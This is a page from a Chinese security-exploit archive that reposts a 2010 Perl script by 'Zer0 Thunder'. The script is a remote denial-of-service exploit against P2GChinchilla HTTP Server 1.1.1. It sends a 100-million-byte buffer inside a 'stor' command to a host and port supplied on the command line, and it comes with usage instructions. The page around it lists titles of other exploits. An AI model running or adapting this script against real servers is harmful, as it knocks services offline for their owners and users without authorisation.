首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
P2GChinchilla HTTP Server version 1.1.1 remote denial of service exploit
来源:zer0_thunder@colombohackers.com 作者:Thunder 发布时间:2010-01-27  
#!/usr/bin/perl
# File Name :P2GChinchilla[TM] HTTP Server
# Vuln : Remote Denial Of Service Exploit
# Auther : Zer0 Thunder
# Msn : zer0_thunder@colombohackers.com
#
# 
##==------>>
#
# Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of Service Exploit
# Date: 22/01/2010
# Author: Zer0 Thunder
# Site  : http://www.proggies2go.org/pages/p2gChinchilla.html?ref=PAD
# Software Link: http://www.proggies2go.org/pages/p2gChinchilla/p2gChinchilla.rar
# Version: v 1.1.1
# Tested on: Server runs on Windows XP Sp2 /Test on Remote Location
##==------>> 
use IO::Socket::INET;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print "\t+================================================================+\n";
print "\t+ ---  P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service  ---+\n";
print "\t+ ---  Author :Zer0 Thunder                                   ---+\n";
print "\t+ ---  DATE:  :[24/01/2010]                                   ---+\n";
print "\t+ ---  ------------------------------------------------       ---+\n";
print "\t+ ---  Usage  :perl exploit.pl [Host/Remote IP] [Port]        ---+\n";
print "\t+ ---                                                         ---+\n";
print "\t+================================================================+\n";
print "\n"; 
print " Ex : exploit.pl localhost 50000\n";  # P2GChinchilla Default Port is 50000
 
 
exit;
}
 
print "\t+================================================================+\n";
print "\t+ ---  P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service  ---+\n";
print "\t+ ---  Author :Zer0 Thunder                                   ---+\n";
print "\t+ ---  DATE:  :[24/01/2010]                                   ---+\n";
print "\t+ ---  ------------------------------------------------       ---+\n";
print "\t+ ---  Usage  :perl exploit.pl [Host/Remote IP] [Port]        ---+\n";
print "\t+ ---                                                         ---+\n";
print "\t+================================================================+\n";
print "\n";  
print " Wait Till The Buffer is Done\n"; 
my $b1 = "\x41" x 100000000;
print "\n";
print " DoS is UP !.. N Give it a Second \n";

$DoS=IO::Socket::INET->new("$ip:$port") or die;

print $DoS "stor $b1\n";
print $DoS "QUIT\n";
 
close $DoS;

# exit :

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Status2k Remote Add Admin Expl
·BoastMachine version 3.1 suffe
·AOL 9.5 Phobos.Playlist 'Impor
·Status2k remote add administra
·Winamp v5.572 whatsnew.txt Loc
·AIC Audio Player 1.4.1.587 Loc
·Winamp v5.572 whatsnew.txt Sta
·South River Technologies WebDr
·KOL WaveIOX 1.04 (.wav) Local
·Winamp 5.572 Exploit - SEH
·IE浏览器wshom.ocx ActiveX控件
·Internet Explorer 6/7 - Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved